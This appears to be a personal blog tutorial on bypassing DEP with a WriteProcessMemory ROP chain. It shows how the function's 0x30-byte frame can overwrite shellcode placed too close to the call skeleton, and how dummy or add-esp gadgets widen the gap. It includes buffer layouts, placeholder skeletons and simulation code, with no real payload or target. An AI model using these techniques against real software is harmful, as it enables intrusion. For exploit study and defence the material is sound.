Bypassing DEP - Increasing the Gap
This blog talks about how to use the WriteProcessMemory API call to execute shellcode in a scenario where there is very little gap between the shellcode and the WriteProcessMemory call skeleton.
In this blog, I have documented yet another lesser-known way to bypass DEP using the WriteProcessMemory API call, for the scenario where your shellcode is large but you have very little space to insert it. We will talk about how you can give up part of the ROP chain's space to protect your shellcode, so that it is not corrupted during the WriteProcessMemory API operation.
The following is the function definition of the WriteProcessMemory API call :-
BOOL WriteProcessMemory(
  [in]  HANDLE  hProcess,
  [in]  LPVOID  lpBaseAddress,
  [in]  LPCVOID lpBuffer,
  [in]  SIZE_T  nSize,
  [out] SIZE_T  *lpNumberOfBytesWritten
);
WriteProcessMemory takes five arguments. The first, hProcess, is a handle to the process whose memory will receive the contents of lpBuffer. Passing -1 (0xFFFFFFFF as a 32-bit value, the pseudo-handle returned by GetCurrentProcess) refers to the current process. Next is lpBaseAddress, the destination address the bytes are copied to. Next is lpBuffer, the source address the bytes are copied from. Next is nSize, the number of bytes to copy. Finally, lpNumberOfBytesWritten is the address where WriteProcessMemory stores the number of bytes it actually copied. Windows allows this pointer to be NULL, but if a non-NULL address is supplied it must be writable.
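Because WriteProcessMemory is a 32-bit stdcall (WINAPI) function, its arguments sit on the stack in declaration order right above the return address. The small sketch below, assuming 32-bit x86 with 4-byte stack slots and the standard push ebp / mov ebp,esp prologue, just computes where each argument lives, first relative to ESP at function entry and then relative to EBP.

```python
# Sketch: stack offsets of WriteProcessMemory's arguments on 32-bit x86 (stdcall).
# Assumes 4-byte stack slots and the standard "push ebp / mov ebp,esp" prologue.
PARAMS = ["hProcess", "lpBaseAddress", "lpBuffer", "nSize", "lpNumberOfBytesWritten"]
SLOT = 4  # size of one stack slot on 32-bit x86


def entry_offsets():
    """Offsets from ESP at function entry: [esp] holds the return address."""
    offsets = {"return address": 0}
    for i, name in enumerate(PARAMS):
        offsets[name] = SLOT * (i + 1)
    return offsets


def ebp_offsets():
    """Offsets from EBP after push ebp / mov ebp,esp (saved EBP sits at [ebp])."""
    # push ebp moves ESP down one slot, so every entry offset grows by SLOT.
    return {name: off + SLOT for name, off in entry_offsets().items()}


for name, off in ebp_offsets().items():
    print(f"{name:24} [ebp+{off:#x}]")
```

With this layout hProcess ends up at [ebp+8] and lpBaseAddress at [ebp+0xc], which matches the `push dword ptr [ebp+8]` and `push dword ptr [ebp+0Ch]` operands in the kernelbase disassembly further down.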
Moving on, let's assume a scenario where an application is vulnerable to a buffer overflow. Say the EIP overwrite happens at the 451st byte of the input buffer, and a total of 750 bytes must be sent to trigger the overflow. In that case the input would look like below :-
Input buffer = "A"*450 + "B"*4 + "C"*(750-450-4)
Once we send the above input to the vulnerable application, it overwrites EIP with 0x42424242 and crashes the program. We also verify that the application is compiled with DEP enabled, so executing shellcode will require a ROP chain.
Let's assume that our shellcode is 410 bytes long. In that case, we place the shellcode at the start of the buffer, in place of the first 410 A's. Now the input would look like below :-
Input buffer = shellcode + "A"*(450-410) + "B"*4 + "C"*296
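A minimal sketch of this layout, assuming the offsets from the scenario (450 bytes before EIP, 750 bytes in total). The shellcode here is a hypothetical placeholder of 0xCC bytes with the assumed 410-byte size, and `build_buffer` is a helper name introduced only for illustration.

```python
# Sketch: put the shellcode at the start of the 450-byte region before EIP.
# The 410-byte "shellcode" below is a placeholder (0xCC bytes), not real shellcode.
TOTAL_LEN = 750
EIP_OFFSET = 450  # bytes before the saved return address


def build_buffer(shellcode: bytes, eip: bytes = b"B" * 4) -> bytes:
    """Return shellcode + 'A' padding + EIP + 'C' filler, always TOTAL_LEN bytes."""
    if len(shellcode) > EIP_OFFSET:
        raise ValueError("shellcode does not fit before the EIP overwrite")
    buf = shellcode + b"A" * (EIP_OFFSET - len(shellcode))
    buf += eip
    buf += b"C" * (TOTAL_LEN - len(buf))
    return buf


shellcode = b"\xcc" * 410  # hypothetical placeholder of the assumed size
buf = build_buffer(shellcode)
print(len(buf), buf.count(b"A"), buf.count(b"C"))  # 750 40 296
```

Computing the trailing filler as `TOTAL_LEN - len(buf)` keeps the total length fixed no matter how the pieces before it change.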
Now, let's create the skeleton for the WriteProcessMemory API call. Apart from hProcess, every value below is a placeholder that the ROP chain patches at runtime.
import struct
wp = struct.pack("<L",0x45454545) # WriteProcessMemory address (read from its IAT entry at runtime)
wp += struct.pack("<L",0x46464646) # Return address used once WriteProcessMemory finishes
wp += struct.pack("<L",0xffffffff) # hProcess (-1 = current process)
wp += struct.pack("<L",0x47474747) # lpBaseAddress (destination address)
wp += struct.pack("<L",0x48484848) # lpBuffer (source address, i.e. our shellcode)
wp += struct.pack("<L",0x49494949) # nSize (number of bytes to copy)
wp += struct.pack("<L",0x50505050) # lpNumberOfBytesWritten (must point to writable memory)
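To make "patching wp at runtime" concrete, the sketch below simulates in Python what the ROP chain achieves in memory: it overwrites selected DWORDs of the skeleton at fixed offsets from the start of wp. The field names and the `patch` helper are hypothetical labels for illustration, and the lpBuffer value is an arbitrary example address, not one taken from a real target.

```python
import struct

# Rebuild the 28-byte skeleton from above in one call (same placeholder values).
wp = struct.pack("<7L", 0x45454545, 0x46464646, 0xFFFFFFFF,
                 0x47474747, 0x48484848, 0x49494949, 0x50505050)

# Byte offset of each DWORD from the start of wp; these are the offsets a
# ROP chain has to add to its wp pointer before writing each value.
FIELDS = ["func", "ret", "hProcess", "lpBaseAddress",
          "lpBuffer", "nSize", "lpNumberOfBytesWritten"]
OFFSET = {name: 4 * i for i, name in enumerate(FIELDS)}


def patch(skeleton: bytes, values: dict) -> bytes:
    """Simulate the runtime patching: overwrite the named DWORDs in a copy."""
    frame = bytearray(skeleton)
    for name, value in values.items():
        struct.pack_into("<L", frame, OFFSET[name], value)
    return bytes(frame)


# Hypothetical values: nSize is the assumed 410-byte shellcode length and
# lpBuffer is an arbitrary example address.
patched = patch(wp, {"nSize": 410, "lpBuffer": 0x04FFFE5A})
print(hex(struct.unpack_from("<L", patched, OFFSET["nSize"])[0]))  # 0x19a
```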
Now the input would look something like below (wp is 28 bytes, so 410 + 12 + 28 = 450 bytes precede EIP) :-
Input buffer = shellcode + "A"*12 + wp + EIP + <ROP Chain>
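A quick sketch that assembles this layout and checks the arithmetic. The shellcode, the EIP value and the ROP chain are all placeholders (assumptions), since only the sizes matter here.

```python
import struct

TOTAL_LEN = 750
EIP_OFFSET = 450

shellcode = b"\xcc" * 410  # hypothetical 410-byte placeholder
wp = struct.pack("<7L", 0x45454545, 0x46464646, 0xFFFFFFFF,
                 0x47474747, 0x48484848, 0x49494949, 0x50505050)
eip = struct.pack("<L", 0x42424242)  # placeholder for the first ROP gadget

buf = shellcode + b"A" * 12 + wp + eip
rop = b"C" * (TOTAL_LEN - len(buf))  # placeholder for the ROP chain
buf += rop

wp_offset = buf.index(wp)
print(wp_offset, wp_offset + len(wp) == EIP_OFFSET, len(rop))  # 422 True 296
```

Only the 12 padding bytes separate the end of the shellcode from the start of wp, which is exactly what the question below is about.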
A question for readers: does the above input structure look safe from shellcode corruption once our ROP chain has patched wp at runtime and redirected execution to the start of wp?
If you answered NO, then great work. You spotted a potential rabbit hole and saved yourself some time.
Well, if you answered YES, then you just fell into a rabbit hole like I did :) . Let's talk about why.
To understand the issue, let's dive into the assembly of the WriteProcessMemory function.
0:002> u kernelbase!WriteProcessMemory L50
755f3990 8bff mov edi,edi
755f3992 55 push ebp
755f3993 8bec mov ebp,esp
755f3995 83ec30 sub esp,30h
755f3998 53 push ebx
755f3999 57 push edi
755f399a 33db xor ebx,ebx
755f399c 8d45d0 lea eax,[ebp-30h]
755f399f 53 push ebx
755f39a0 6a1c push 1Ch
755f39a2 50 push eax
755f39a3 6a08 push 8
755f39a5 ff750c push dword ptr [ebp+0Ch]
755f39a8 895df8 mov dword ptr [ebp-8],ebx
755f39ab ff7508 push dword ptr [ebp+8]
755f39ae 895df4 mov dword ptr [ebp-0Ch],ebx
755f39b1 895dfc mov dword ptr [ebp-4],ebx
755f39b4 ff1548046975 call dword ptr [KERNELBASE!imp_NtQueryVirtualMemory (75690448)]
755f39ba 8bc8 mov ecx,eax
755f39bc 85c9 test ecx,ecx
Let's skim through the WriteProcessMemory function in kernelbase. As shown above, the prologue (mov edi,edi / push ebp / mov ebp,esp) is followed by a sub esp,30h instruction, which reserves 0x30 (48) bytes of stack space for WriteProcessMemory's local variables. After that come several push instructions that save registers and place the arguments for the NtQueryVirtualMemory call on the stack.
Recall that our input buffer has the following format :-
input buffer = shellcode + "A" * 12 + wp + EIP + ROP
Once our ROP gadgets have run, ESP points to the start of wp and the chain's final ret jumps directly into WriteProcessMemory. To make this concrete, let's assume that wp starts at address 0x5000000. The input then looks something like this in the address space :-
0x4fffe5a <start of shellcode>
0x4ffffd0 <DWORD inside shellcode>
0x4fffff3 <last byte of shellcode>
0x4fffff4 <start of "A"*12 padding>
0x5000000 <start of wp> -> ESP points here
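The addresses above follow from the wp address by subtracting the padding and the shellcode. A small sketch of that arithmetic, using the hypothetical wp address 0x5000000 and the assumed 410-byte shellcode; note that the 12 bytes of "A" padding have to be counted as well.

```python
# Sketch: where each part of the buffer lands if wp starts at 0x05000000
# (the hypothetical address used in the text).
WP_ADDR = 0x05000000
SHELLCODE_LEN = 410
PADDING_LEN = 12  # the "A" * 12 between shellcode and wp

shellcode_start = WP_ADDR - PADDING_LEN - SHELLCODE_LEN
shellcode_last = shellcode_start + SHELLCODE_LEN - 1
gap = WP_ADDR - (shellcode_last + 1)  # bytes between shellcode end and wp

print(hex(shellcode_start), hex(shellcode_last), gap)  # 0x4fffe5a 0x4fffff3 12
```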
Before WriteProcessMemory is called, ESP points to the start of wp, because a ROP chain uses the stack as its list of return addresses. The final ret pops the first DWORD of wp (the WriteProcessMemory address) into EIP, which leaves ESP at 0x5000004, where our return address sits, exactly as after a normal call. The push ebp in the prologue then moves ESP back to 0x5000000, so when EIP reaches address 0x755f3995 in WriteProcessMemory, ESP still points to 0x5000000. The moment EIP executes sub esp,30h, ESP becomes 0x4ffffd0. As you might have guessed, this is where the problem starts.
Since there is not enough space between the end of the shellcode and the start of wp, ESP ends up pointing inside our shellcode. The subsequent push instructions, and the return address pushed by the call, overwrite our shellcode and the exploit fails.
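The sketch below replays only the stack writes of the WriteProcessMemory instructions listed above (up to and including the call to NtQueryVirtualMemory) for the hypothetical layout with wp at 0x5000000, and counts how many land inside the shellcode. It is a lower bound by assumption: the rest of WriteProcessMemory and NtQueryVirtualMemory itself use more stack below this point, and any locals the function writes inside its 0x30-byte frame would overlap the shellcode's tail too.

```python
# Sketch: replay the modeled stack writes for wp at 0x05000000 and count
# how many of them hit the shellcode (410 bytes + 12 bytes of padding).
WP_ADDR = 0x05000000
SHELLCODE_START = WP_ADDR - 12 - 410  # 0x04FFFE5A
SHELLCODE_END = WP_ADDR - 12          # one past the last shellcode byte

writes = []  # (address, size) of every stack write we model

esp = WP_ADDR + 4  # ret popped wp[0] (the WriteProcessMemory address)
esp -= 4           # push ebp
writes.append((esp, 4))
ebp = esp          # mov ebp,esp
esp -= 0x30        # sub esp,30h
esp_after_sub = esp

# push ebx, push edi, push ebx, push 1Ch, push eax, push 8,
# push [ebp+0Ch], push [ebp+8]
for _ in range(8):
    esp -= 4
    writes.append((esp, 4))

# mov [ebp-8],ebx / mov [ebp-0Ch],ebx / mov [ebp-4],ebx
for disp in (8, 0xC, 4):
    writes.append((ebp - disp, 4))

esp -= 4  # call pushes its return address
writes.append((esp, 4))

hits = [a for a, size in writes
        if a < SHELLCODE_END and a + size > SHELLCODE_START]
print(hex(esp_after_sub))              # 0x4ffffd0
print(len(hits), "of", len(writes))    # 9 of 13
print(hex(min(a for a, _ in writes)))  # 0x4ffffac
```

The three mov writes happen to land in the "A" padding, but every push and the call's return address fall inside the shellcode.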
Now that we understand the rabbit hole, let's find a way out.
The basic idea is to increase the space between the end of the shellcode and the start of wp so that ESP doesn't end up inside our shellcode. We can do something interesting here.
Suggested input structure :-
Input buffer = shellcode + "A"*12 + EIP + <dummy instructions to increase gap between shellcode and wp> + wp + rop
The above input structure uses dummy instructions to increase the gap between the shellcode and wp. We can use gadgets such as xor eax,eax ; ret, or any other gadget without harmful side effects, to widen this gap. But this comes with a trade-off: it eats into the space available for our ROP chain. The more dummy instructions we use, the less space is left for the ROP chain.
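A rough sketch of that trade-off, assuming 4-byte dummy gadgets and the 750-byte buffer from the scenario. REQUIRED_GAP is an assumption: 0x54 bytes is only how far below wp the first instructions of the disassembly listing write (push ebp, the 0x30-byte frame, eight pushes and the call's return address), so treat it as a lower bound and measure the real depth in the debugger. `dummy_gadgets_needed` is a hypothetical helper name.

```python
import math

# Sketch: how many 4-byte dummy gadgets are needed between EIP and wp so that
# WriteProcessMemory's stack writes stay above the shellcode, and how much
# room is then left for the ROP chain.
SPACE_AFTER_EIP = 750 - 450 - 4  # 296 bytes for dummies + wp + ROP chain
WP_LEN = 28
FIXED_GAP = 12 + 4               # "A" * 12 plus the EIP slot already sit below wp
REQUIRED_GAP = 0x54              # assumed lower bound, see lead-in


def dummy_gadgets_needed(required_gap: int) -> int:
    """Number of 4-byte dummy gadgets that widen the gap to required_gap."""
    missing = max(0, required_gap - FIXED_GAP)
    return math.ceil(missing / 4)


n = dummy_gadgets_needed(REQUIRED_GAP)
rop_space = SPACE_AFTER_EIP - 4 * n - WP_LEN
print(n, rop_space)  # 17 200
```

Every extra dummy gadget costs 4 bytes that the ROP chain can no longer use, which is the trade-off described above.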
One trick to work around this smartly is to use an instruction like add esp,0x20. Instead of spending several dummy gadgets, a single gadget advances ESP right away, increasing the gap between the shellcode and ESP. This requires fewer dummy instructions and can help us land right in our ROP chain. With proper stack alignment, it can be used to make EIP point to the start of our ROP chain rather than somewhere in the middle of it.
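"Proper stack alignment" here means the number of skipped bytes must match the add esp operand exactly. A sketch under that reading, with hypothetical gadget addresses: when `add esp,0x20 ; ret` runs, ESP already points just past the gadget's own slot (the previous ret popped it), so its ret pops the DWORD located 4 + 0x20 bytes after that slot.

```python
import struct

# Sketch: lay out an "add esp,0x20 ; ret" gadget so that its ret lands exactly
# on the next gadget. Both gadget addresses are hypothetical placeholders.
ADD_ESP_20_RET = 0x10101010  # hypothetical: add esp,0x20 ; ret
NEXT_GADGET = 0x20202020     # hypothetical: first gadget of the real ROP chain
SKIP = 0x20

chain = struct.pack("<L", ADD_ESP_20_RET)
chain += b"D" * SKIP         # skipped bytes: never executed, they only widen the gap
chain += struct.pack("<L", NEXT_GADGET)


def ret_target(chain: bytes, gadget_offset: int, skip: int) -> int:
    """Return the DWORD popped by ret after 'add esp,skip' at gadget_offset.

    ESP points just past the gadget's own 4-byte slot when it executes,
    so ret pops the DWORD at gadget_offset + 4 + skip.
    """
    return struct.unpack_from("<L", chain, gadget_offset + 4 + skip)[0]


print(hex(ret_target(chain, 0, SKIP)))  # 0x20202020
```

If the filler were a byte short or long, ret would pop a misaligned DWORD made partly of filler, and execution would not reach the intended gadget.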
I discovered this trick during my learning process. I have not come across many blogs explaining a workaround for these size restrictions, so I thought it would be a good idea to share it with the community. Contact me on Twitter with any feedback.